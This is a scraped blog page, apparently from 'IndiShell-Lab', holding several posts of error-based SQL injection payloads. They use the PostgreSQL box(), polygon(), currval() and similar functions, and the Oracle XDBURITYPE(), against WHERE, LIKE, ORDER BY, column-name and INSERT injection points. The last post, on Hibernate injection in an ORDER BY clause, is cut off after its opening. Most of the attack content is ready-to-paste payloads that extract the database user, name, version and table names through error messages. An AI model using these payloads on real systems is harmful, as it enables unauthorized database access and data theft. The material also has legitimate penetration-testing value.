Sans;">has_database_privilege</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">has_any_column_privilege</span></li></ol><p></p><p></p><p></p><p>ETC.</p><p><span style="color: #ffa400; font-size: x-large;"><u>box()</u></span></p><p>box keyword is my favorite 😎so I am gonna pick this one. </p><p><span style="background-color: black; color: #fcff01; font-size: large;">Select Statement - Where Clause</span> </p><p>Lets start with case of <span style="color: #fcff01;">Where clause </span>when user supplied data is getting pass as value to where clause in a <span style="color: #fcff01;">Select </span>statement. For example, below mentioned is the vulnerable SQL query:</p><pre><textarea cols="20" rows="2" style="height: 27px; width: 365px;"> SELECT * FROM admins where id=User_Supplied_Data</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7hvZ0WJThSWKd5twxsVi0bdhTS_rUg80PEV-ed0n6vYwtfAEUA34QKs2pi5WBlPGdWtkB87_SQKMybtARnlth5OPvJln-GZSyc6cTVYNcv4ExEstEoYr8axekRYRJOTmSMqFZ76heKo2ket0hxlsib2o9zi6Yv6lrHrn1coTaCjjbJeje2A8sDs77VAo/s1424/1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="528" data-original-width="1424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7hvZ0WJThSWKd5twxsVi0bdhTS_rUg80PEV-ed0n6vYwtfAEUA34QKs2pi5WBlPGdWtkB87_SQKMybtARnlth5OPvJln-GZSyc6cTVYNcv4ExEstEoYr8axekRYRJOTmSMqFZ76heKo2ket0hxlsib2o9zi6Yv6lrHrn1coTaCjjbJeje2A8sDs77VAo/s16000/1.png" /></a></div><br /><p>To exploit this injection point we can use below mentioned payload to execute SQL query and force Database to reveal the output in Database error message:</p><p>👉 Payload to extract the current SQL server username:</p><pre><textarea cols="20" rows="2" style="height: 27px; width: 205px;"> and ''=''||box(user)</textarea></pre><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcAVWHdhXosms65hVUxlCm5K98Zsc05sHFe1jntxyGvJcum8Th__hZMNhGGLbXgGlnKtMebvf9eZ0gwFxjCD7HDv8Is6PRD57QhwSofJYXKwojbevfjzFYG9Jp9rIKBlwvqdAFj516kD34f14VZwYEA06Z_GIo0uXWEFCeSYeV-5MZUa38N_UhyNKzNFA/s1711/2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="537" data-original-width="1711" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcAVWHdhXosms65hVUxlCm5K98Zsc05sHFe1jntxyGvJcum8Th__hZMNhGGLbXgGlnKtMebvf9eZ0gwFxjCD7HDv8Is6PRD57QhwSofJYXKwojbevfjzFYG9Jp9rIKBlwvqdAFj516kD34f14VZwYEA06Z_GIo0uXWEFCeSYeV-5MZUa38N_UhyNKzNFA/s16000/2.png" /></a></div><div class="separator" style="clear: both; text-align: left;"><p>👉 Payload to extract the name of current database:</p><pre><textarea cols="20" rows="2" style="height: 27px; width: 285px;"> and ''=''||box(current_database())</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7FYVLQ4SF-pOQPQLSe8Z8Ax5mlZ4PKuZj6QH_lVCSp-D7DMTeOQ0nSkDzDOjdJ2WaJqGG8D-1O_erxVpq6Mmw-8QkxGYqQYHV7FQiC0Zp0UdGLOhC2OZHWagUoglOVpuq5INMYebbyt2ppGhYSfY_K6KXxPjtcwnpD5vPtNQlRcwTLUo1SmpfTNw1JcQ/s1754/3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="588" data-original-width="1754" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7FYVLQ4SF-pOQPQLSe8Z8Ax5mlZ4PKuZj6QH_lVCSp-D7DMTeOQ0nSkDzDOjdJ2WaJqGG8D-1O_erxVpq6Mmw-8QkxGYqQYHV7FQiC0Zp0UdGLOhC2OZHWagUoglOVpuq5INMYebbyt2ppGhYSfY_K6KXxPjtcwnpD5vPtNQlRcwTLUo1SmpfTNw1JcQ/s16000/3.png" /></a></div><br /><span>👉 Payload to extract the name of first table in current database:</span><pre><textarea cols="20" rows="2" style="height: 27px; width: 950px;"> and ''=''||box((select table_name from information_schema.tables where table_catalog=current_database() limit 1 offset 0))</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI3DP0_KbExQzMklEkEXDqh0hzNTLdXvc9_rccoXzbGnLS9uq-f2FC58vG_7uR9SfZr1ZfQ7d3qdIrf9kcKkVqI4TqKtpGpIhw1FUfMdh5CA8U99O1S1Pw6j4Zd1UIgR5YLrjIy0dVf5eCX7GqlZ6RA5rinpG61ssOpq1Q8iM_FQygnUZem-OFqjyIU0c/s1277/4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="517" data-original-width="1277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI3DP0_KbExQzMklEkEXDqh0hzNTLdXvc9_rccoXzbGnLS9uq-f2FC58vG_7uR9SfZr1ZfQ7d3qdIrf9kcKkVqI4TqKtpGpIhw1FUfMdh5CA8U99O1S1Pw6j4Zd1UIgR5YLrjIy0dVf5eCX7GqlZ6RA5rinpG61ssOpq1Q8iM_FQygnUZem-OFqjyIU0c/s16000/4.png" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p><span style="background-color: black;"><span style="color: #fcff01; font-size: large;">Select Statement - Like Clause</span> </span>: </p><p>Lets start with case of <span style="color: #fcff01;">Like clause </span>when user supplied data is getting pass to like clause in a <span style="color: #fcff01;">Select </span>statement. For example, below mentioned is the vulnerable SQL query:</p><pre><textarea cols="20" rows="2" style="height: 27px; width: 500px;">SELECT * FROM admins where handle like 'User_Supplied_data%'</textarea></pre><span><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzq9yhhGl4dwym0wLODrd7ZxmpZmdF-nHhUpovsiy8dLgrRYeGSECwDoOU4owJxGeYEW2HsKT75pKa7wDMvo-Gi12n8e55G5DLusavnmoce_hXBFR-lRw4dVG5cs5NuwIlRqS3sSWirj0N_2B6Zagvdgiefq67rlggtxaioX43wVkf9IwbM0_i76K6G6c/s1472/like.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="563" data-original-width="1472" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzq9yhhGl4dwym0wLODrd7ZxmpZmdF-nHhUpovsiy8dLgrRYeGSECwDoOU4owJxGeYEW2HsKT75pKa7wDMvo-Gi12n8e55G5DLusavnmoce_hXBFR-lRw4dVG5cs5NuwIlRqS3sSWirj0N_2B6Zagvdgiefq67rlggtxaioX43wVkf9IwbM0_i76K6G6c/s16000/like.png" /></a></div><br /></div>How to exploit it? There we go..</span><div><span><br />👉 Payload to extract the current SQL server username:</span><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><textarea cols="20" rows="2" style="height: 27px; width: 250px;">'||box(current_database())--+ </textarea></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis6Kz-lNeCuozmYmbq4ysa3Oy2a6FyTKchh2NU8dzoxoNfJEs7hDxcDkJkVFTLQNbKYJjyQVwXqdV8h89ef94Z6roV6p2mlskzzUXvmXlpYx97K7kMC_8vdMc3e29GeIikYRUyuDPwiZGbnWii0KrmDdl-J-dPBVrl6v_bjR5UV547QARaJNXnxuUVpK4/s1452/like11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="471" data-original-width="1452" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis6Kz-lNeCuozmYmbq4ysa3Oy2a6FyTKchh2NU8dzoxoNfJEs7hDxcDkJkVFTLQNbKYJjyQVwXqdV8h89ef94Z6roV6p2mlskzzUXvmXlpYx97K7kMC_8vdMc3e29GeIikYRUyuDPwiZGbnWii0KrmDdl-J-dPBVrl6v_bjR5UV547QARaJNXnxuUVpK4/s16000/like11.png" /></a></div><br /><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><span>👉 Payload to extract the name of first table in current database:</span><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><textarea cols="20" rows="2" style="height: 34px; width: 900px;">'||box((select table_name from information_schema.tables where table_catalog=current_database() limit 1 offset 0))--+</textarea></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAQPHCfadl6k2IUp7TkEuOE1QnNyqcTg75KUHy_PxrpAv7G2piEI_RTzk4LXvdDFjmkE1IHIilfECoFZGKQVvceTvmZkOxVyKzBh9mnw0G-ivwz1fPDAj9iH6qqNvFCgXClsgPN-qLhk8vdMixYfeRRMKKuxMbEwvoZVIPyJaOVFJXqiF8bVBmn3JM5cQ/s1462/like12.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="607" data-original-width="1462" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAQPHCfadl6k2IUp7TkEuOE1QnNyqcTg75KUHy_PxrpAv7G2piEI_RTzk4LXvdDFjmkE1IHIilfECoFZGKQVvceTvmZkOxVyKzBh9mnw0G-ivwz1fPDAj9iH6qqNvFCgXClsgPN-qLhk8vdMixYfeRRMKKuxMbEwvoZVIPyJaOVFJXqiF8bVBmn3JM5cQ/s16000/like12.png" /></a></div><br /><div class="separator" style="clear: both;"><br /></div></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><p><span style="background-color: black;"><span style="color: #fcff01; font-size: large;">Select Statement - Order By Clause</span> </span>: </p><p>Let's suppose, we have below mentioned vulnerable SQL query:</p><pre><textarea cols="20" rows="2" style="height: 27px; width: 400px;">SELECT * FROM admins order by User_Supplied_Data</textarea></pre></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDfL31tZBB_icDRyJeJNTShG_QK7q7oBW-o7wJz7ViwgK5NdFwznXlhfyLgqoenVpG8EV4YK_WoQMbC3fnBgbWcmbp7cD9pNnOk4Pzz-nS24Kkzh8D4B9w1e7BkWRkSbdi2xDSe_I4Fc71emyi_i4omzXzg_prV3VWFBay0dlgFsAzXUvtZn9DG8nrDuE/s1274/order.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="531" data-original-width="1274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDfL31tZBB_icDRyJeJNTShG_QK7q7oBW-o7wJz7ViwgK5NdFwznXlhfyLgqoenVpG8EV4YK_WoQMbC3fnBgbWcmbp7cD9pNnOk4Pzz-nS24Kkzh8D4B9w1e7BkWRkSbdi2xDSe_I4Fc71emyi_i4omzXzg_prV3VWFBay0dlgFsAzXUvtZn9DG8nrDuE/s16000/order.png" /></a></div><br /><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><span>👉 Payload to extract the current SQL server username:</span></div><br /><div class="separator" style="clear: both; text-align: left;"><textarea cols="20" rows="2" style="height: 27px; width: 250px;">(select 1 from box(user))</textarea></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBQ_BTilG4sCZhGDyYHonztXKnTOyeEUlQlqmmSdrwpAw11nPp0JQvofWNO86TJ5vJavyHU7_2GCkcwzSEhi84tgsYwnpcWDvGbSop3qQEoOY5M-ZkbjIEBEXk5hAt_M6Ga12NVCIyhLEpuWlv_BLwFIeseKdCSMoclN0hLqEOmUfpcygUG9Dv0AicOu8/s1282/order1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="552" data-original-width="1282" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBQ_BTilG4sCZhGDyYHonztXKnTOyeEUlQlqmmSdrwpAw11nPp0JQvofWNO86TJ5vJavyHU7_2GCkcwzSEhi84tgsYwnpcWDvGbSop3qQEoOY5M-ZkbjIEBEXk5hAt_M6Ga12NVCIyhLEpuWlv_BLwFIeseKdCSMoclN0hLqEOmUfpcygUG9Dv0AicOu8/s16000/order1.png" /></a></div><div class="separator" style="clear: both;"><br /></div></div><div class="separator" style="clear: both; text-align: left;"><span>👉 Payload to extract </span>the name of first table in current database:<div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;"><textarea cols="20" rows="2" style="height: 27px; width: 950px;">(select 1 from box((select table_name from information_schema.tables where table_catalog=current_database() limit 1 offset 0)))</textarea></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh4tLaPykvSL8Ll-3bRBBaJi_t21FoOrQIbVC1q7SRAIE0u1o93mvRFR7bS_i9KlVXTVsYHsRVW5QzIDxdefHffS8ELL3WY12rVJ5jRgT77AtoS3TZ-Mzwdolv2y4E3QumSZE-IYWFqtTiDaTuRVOc2VNQEBuniiCYJ87s51ubadn9YzHIruA2vJwkaA8/s1431/order2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="504" data-original-width="1431" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh4tLaPykvSL8Ll-3bRBBaJi_t21FoOrQIbVC1q7SRAIE0u1o93mvRFR7bS_i9KlVXTVsYHsRVW5QzIDxdefHffS8ELL3WY12rVJ5jRgT77AtoS3TZ-Mzwdolv2y4E3QumSZE-IYWFqtTiDaTuRVOc2VNQEBuniiCYJ87s51ubadn9YzHIruA2vJwkaA8/s16000/order2.png" /></a></div><br /><div class="separator" style="clear: both;"><br /></div></div><div class="separator" style="clear: both; text-align: left;"><p><span style="color: #ffa400; font-size: x-large;"><u>Other Functions usage</u></span></p><p>Similarly, we can use below mentioned PostgreSQL functions as well to exploit error based SQL Injection. All we need to do is, just replace the box() with any of the functions mentioned below and change the SQL query/variable mentioned in them (current_database()) with the one which we want : </p><p><span style="color: #fcff01;"><b>Different functions to extract the current database:</b></span></p><div class="separator" style="clear: both;"><textarea cols="20" rows="2" style="height: 197px; width: 550px;">row_security_active(concat('~',current_database(),'~'))
pg_has_role(1337,user)
polygon(concat('~',current_database(),'~'))
currval(concat('~',current_database(),'~'))
nextval(concat('~',current_database(),'~'))
setval(concat('~',current_database(),'~'),1337)
path(concat('~',current_database(),'~'))
lseg(concat('~',current_database(),'~'))
point(concat('~',current_database(),'~'))
has_database_privilege(1337,user)
...
...
</textarea></div><span>For now, we are done and I will be back with some new stuff. <br />Thanks for your time. <br /><br />With Love from </span></div><div class="separator" style="clear: both; text-align: left;"><span>❤️ --==[ IndiShell-Lab ]]==-- </span>❤️</div>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-81171338824973189952023-12-09T14:18:00.006+05:302023-12-10T22:01:21.386+05:30New payload to exploit Error-based SQL injection - Oracle database<p> <span><br />Pranaam to all </span><span style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">🙏</span><span><br /><br />I was testing new payload to exploit error-based SQL injection when backend database is Oracle or PostgreSQL (will post about them in next blogpost). </span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-OS2f-mXfdaYpguMckC9BXz2Etxgn6-LaGzwnRYqd5NWvwb7jC2IpATiZ34y0ik3dkW3VIfGT5MRurL9azWIg89WnR-7n0JQiGxwZjwgpNdrpCdF341rIYrAP3v7Ii6RDNp-zaWuKNHfpLWwBEfjt5nexYekBXPY_FILCqxF0ksLfGDTAwKwIS5cACno/s1280/one.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-OS2f-mXfdaYpguMckC9BXz2Etxgn6-LaGzwnRYqd5NWvwb7jC2IpATiZ34y0ik3dkW3VIfGT5MRurL9azWIg89WnR-7n0JQiGxwZjwgpNdrpCdF341rIYrAP3v7Ii6RDNp-zaWuKNHfpLWwBEfjt5nexYekBXPY_FILCqxF0ksLfGDTAwKwIS5cACno/s16000/one.png" /></a></div><p>Yeah, that was me at that moment =)) Let's have a look on it. </p><p><br /></p><p><span style="font-size: large;"><span style="color: #fcff01;"><b style="background-color: black;">XDBURITYPE():</b></span> </span></p><p>We can use <span style="background-color: black;"><span style="color: white;">XDBURITYPE()</span></span> function to perform error-based SQL injection exploitation in case of Oracle database. This function is useful to exploit SQL injection when we have SQL Injection in following scenarios:</p><p><span style="color: #ffa400; font-size: medium;"><u>Select statement:</u></span></p><p><span> </span>👉 <span style="color: #fcff01; font-size: medium;">Column name</span></p><p><span> </span>👉 <span style="color: #fcff01; font-size: medium;">Where clause</span></p><p><span> </span>👉 <span style="color: #fcff01; font-size: medium;">Like clause</span></p><p><u style="color: #ffa400; font-size: large;">Insert Query</u></p><p><u style="color: #ffa400; font-size: large;"><br /></u></p><p><span style="color: #fcff01; font-size: large;">Select Statement - Column name</span> : Lets start with case of <span style="color: #fcff01;">column name</span> when user supplied data is getting pass as column name to <span style="color: #fcff01;">Select </span>statement. For example, below mentioned is the vulnerable SQL query:</p><pre><textarea cols="20" rows="2" style="height: 27px; width: 365px;">select User_Supplied_Data from Team_Indishell;</textarea></pre><p>In this situation, we can use below mentioned payload to execute SQL query and force Database to reveal the output in Database error message:</p><p>👉 Payload to extract the database version:</p><textarea cols="60" rows="2" style="height: 27px; width: 665px;">XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getclob() </textarea><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJNzrQpBo3RB5EzYfKlqmCpQEyAtuYRoZ5kXdI15_Ps4wrTMAiMuONKJupeKjmPiIKrpxRPaiMSSelPJ8o7ajvUO4evgX5157r5Dk1z5LpbgIkDI234EcGsJAayej_-MLawj6sw-MrWktM-Sma2Wn5z8wbR3IbNy1Z_2bSxdgaYSJBwcCHulKOWNitAEw/s1488/5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="342" data-original-width="1488" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJNzrQpBo3RB5EzYfKlqmCpQEyAtuYRoZ5kXdI15_Ps4wrTMAiMuONKJupeKjmPiIKrpxRPaiMSSelPJ8o7ajvUO4evgX5157r5Dk1z5LpbgIkDI234EcGsJAayej_-MLawj6sw-MrWktM-Sma2Wn5z8wbR3IbNy1Z_2bSxdgaYSJBwcCHulKOWNitAEw/s16000/5.png" /></a></div><p></p><p>👉 Payload to extract the first table name:</p><textarea cols="120" rows="2" style="height: 27px; width: 965px;"> XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob() </textarea><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnK2Bc6Vpt_8J2OPoRzYSvZ0fvigZdFjGPqCL57FYRdYMqPIDBYysg73BvqWJpOUcHcRhp7R-kHO_sDION5pVUToKaTVzSk1oMEF7hwvb3OuDa42013sodczGdvsIj7ZbKkbNExRLuC3Q5vh7N9k8SepQbuHw_PL_N7-DFqy4OradxmJ67ldJHybY4d3g/s1479/4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="365" data-original-width="1479" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnK2Bc6Vpt_8J2OPoRzYSvZ0fvigZdFjGPqCL57FYRdYMqPIDBYysg73BvqWJpOUcHcRhp7R-kHO_sDION5pVUToKaTVzSk1oMEF7hwvb3OuDa42013sodczGdvsIj7ZbKkbNExRLuC3Q5vh7N9k8SepQbuHw_PL_N7-DFqy4OradxmJ67ldJHybY4d3g/s16000/4.png" /></a></div><br /><p><span style="color: #fcff01; font-size: large;">Select Statement - Where Clause:</span> now, let's talk about <span style="color: #fcff01;">Where clause </span>, when user supplied data is getting pass to where clause. We have below mentioned vulnerable SQL query:</p><pre><textarea cols="40" rows="2" style="height: 27px; width: 565px;">select * from Team_Indishell where is_admin='User_Supplied_Data'</textarea></pre><p>In this situation, we can use below mentioned payload to execute SQL query and force Database to reveal its output in Database error message:</p><p>👉 Payload to extract the database version:</p><p><textarea cols="60" rows="2" style="height: 27px; width: 665px;">' ||XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()--</textarea></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJSveG4zSoQy6wYtrZwK0LzQ38Ix_ZwQNbc-_nme2KH-_Fs_ZmmmOr48prEwjpUjPrgq3PEGScr9nnZPTwOEFl28mebe4WNsuEKFn7Nbhf_96_Z3PuRZVwaFjOCz4T3V0qZDK7dClKWccHqyVCLNK1zDFsQh-nqkT1259EkvbRDt7qnpu0xy2eu0y4e-Y/s1364/6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="433" data-original-width="1364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJSveG4zSoQy6wYtrZwK0LzQ38Ix_ZwQNbc-_nme2KH-_Fs_ZmmmOr48prEwjpUjPrgq3PEGScr9nnZPTwOEFl28mebe4WNsuEKFn7Nbhf_96_Z3PuRZVwaFjOCz4T3V0qZDK7dClKWccHqyVCLNK1zDFsQh-nqkT1259EkvbRDt7qnpu0xy2eu0y4e-Y/s16000/6.png" /></a></div><br /><p>👉 Payload to extract the first table name:</p><textarea cols="120" rows="2" style="height: 27px; width: 965px;"> '||XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()-- </textarea><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg52llobmAMzURmCuV6rfIhRsDDmjHkZ61W7HEdIyoGR4TA-o-RjqyV24vdjr6TDWuZTqQjkgpcPCITyLQf_myFbTgxmmmGfgEgCXlJIB5Etd8i66MJJdq9WkaDhdK0oGjG_ciBeJSaYIucaq_IR31f8AM0NxcJ7q_6cEJIACuJOP49QEIGXEjJaeNg4II/s1700/7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="462" data-original-width="1700" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg52llobmAMzURmCuV6rfIhRsDDmjHkZ61W7HEdIyoGR4TA-o-RjqyV24vdjr6TDWuZTqQjkgpcPCITyLQf_myFbTgxmmmGfgEgCXlJIB5Etd8i66MJJdq9WkaDhdK0oGjG_ciBeJSaYIucaq_IR31f8AM0NxcJ7q_6cEJIACuJOP49QEIGXEjJaeNg4II/s16000/7.png" /></a></div><br /><p><span style="color: #fcff01; font-size: large;">Select Statement - Like Clause:</span> Let's discuss the case when user supplied data is getting pass to <span style="color: #fcff01;">like clause</span>. We have below mentioned vulnerable SQL query:</p><p></p><p></p><p></p><p style="-webkit-text-stroke-width: 0px; color: black; font-family: "Times New Roman"; font-size: medium; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-decoration-thickness: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><textarea cols="60" rows="2" style="height: 27px; width: 665px;">select * from Team_Indishell where is_admin='yes' and handle like 'User_Supplied_Data%'</textarea></p><p>To exploit SQL injection, we need to use payload in below mentioned style:</p><p>👉 Payload to extract the first table name:</p><textarea cols="120" rows="2" style="height: 27px; width: 965px;"> '||XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()-- </textarea><div><span style="font-family: monospace;"><span style="font-size: 13.3333px; white-space-collapse: preserve;"><br /></span></span></div><div><span style="font-family: monospace;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgApfUVhe6rVWCmAkMk3h4SL9Dzrh-WigeQvL4sCj9T8Jv4QdBfx-IOQyFffqLGx91AL5m3cxCOEoeQUxKPqSkvAC-rNQNffUhjFsuK27oPyCwT2473VGcLPwN_ZxZnn3vseci0KlVqgt-MVIq_r59T69FkakjsCto33jxF32wzlT13GsNJ-GxPGM-GUws/s1728/8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="419" data-original-width="1728" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgApfUVhe6rVWCmAkMk3h4SL9Dzrh-WigeQvL4sCj9T8Jv4QdBfx-IOQyFffqLGx91AL5m3cxCOEoeQUxKPqSkvAC-rNQNffUhjFsuK27oPyCwT2473VGcLPwN_ZxZnn3vseci0KlVqgt-MVIq_r59T69FkakjsCto33jxF32wzlT13GsNJ-GxPGM-GUws/s16000/8.png" /></a></div><br /><span style="font-size: 13.3333px; white-space-collapse: preserve;"><br /></span></span><p></p><p></p></div><p><span style="color: #fcff01; font-size: large;">Insert Query:</span> Let's suppose we have below mentioned vulnerable SQL Insert query:</p><p></p><p></p><p></p><p style="-webkit-text-stroke-width: 0px;"><textarea cols="60" rows="2" style="height: 27px; width: 665px;">insert into Team_Indishell (id,handle,is_admin) values(5,'User_Supplied_Data','yes');</textarea></p><p>To exploit SQL injection, we need to use payload in below mentioned style:</p><p>👉 Payload to extract the first table name:</p><textarea cols="120" rows="4" style="height: 37px; width: 955px;">insert into Team_Indishell (id,handle,is_admin) values(5,''||XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getblob()||'','yes');</textarea><div><span style="font-family: monospace;"><span style="font-size: 13.3333px; white-space-collapse: preserve;"><br /></span></span></div><div><span style="font-family: monospace;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy3rwoNdjWjcEbaFtkkYgFguSiUHr_eBwdn8RSEZB7HzExIdhlG1JD1zHM9vkJCf4oSx41GPA3eBoHG6OPP9NrKVfKFCQBWa6ea1NzqkShPaYqYzfCTnOW1sg7yKXB2mGCw2R2IaXubaliZK2FnNCkoGQqijsVP2B2VRr6fUst2beOUyB9EcbwhU-MtmI/s1563/9.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="473" data-original-width="1563" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy3rwoNdjWjcEbaFtkkYgFguSiUHr_eBwdn8RSEZB7HzExIdhlG1JD1zHM9vkJCf4oSx41GPA3eBoHG6OPP9NrKVfKFCQBWa6ea1NzqkShPaYqYzfCTnOW1sg7yKXB2mGCw2R2IaXubaliZK2FnNCkoGQqijsVP2B2VRr6fUst2beOUyB9EcbwhU-MtmI/s16000/9.png" /></a></div><br /><div class="separator" style="clear: both; text-align: left;"><span style="font-family: "Times New Roman";">Thank you for your time. </span><span style="font-family: "Times New Roman";">We have reached to end of the blog post 😎</span> </div></span><p>./init 0</p><p>--==[[ Team Indishell ]]==--</p></div>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-55653405114704641852023-03-30T00:52:00.004+05:302023-11-22T11:25:19.397+05:30Exploiting Hibernate Injection in "Order by" Clause (Oracle database)<p>Pranaam to all 🙏<br /></p><span><a name='more'></a></span><p>In this blog post, I will be discussing case of <span style="color: #f1c232;">Hibernate Query Injection</span></p><p>In this case, the web application was passing user-supplied data as column name to "Order by" clause.</p><p>The below mentioned error message indicated that this was the case of Hibernate Injection:<br /> <br />
<textarea cols="30" rows="2" style="height: 30px; width: 253px;">Dual is not mapped [from com.....</textarea></p><p>The moment, we realised that it is something different for which we need to come up with different payload, me and my "Partner in SQLI Crime" suited up 🤩<br /></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEeFenSXbvJVvIbPRUeiKGOgsFuCzLn-PKc1khqoeWww09PrHaWI9D4ioGzCkYGHo5SuLgqsLBQPxVzpv1HmVNuegJoVZi8YY1O3JIjVMD_pYkkW8prrvy-y5jDPWEfjTH6txPttjUtvQKECHl4M7p9DkruTFvDaSjqvUo6MLTfp1CKmbfYag6g7QK/s953/shop.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="721" data-original-width="953" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEeFenSXbvJVvIbPRUeiKGOgsFuCzLn-PKc1khqoeWww09PrHaWI9D4ioGzCkYGHo5SuLgqsLBQPxVzpv1HmVNuegJoVZi8YY1O3JIjVMD_pYkkW8prrvy-y5jDPWEfjTH6txPttjUtvQKECHl4M7p9DkruTFvDaSjqvUo6MLTfp1CKmbfYag6g7QK/s16000/shop.png" /></a></div><br /> 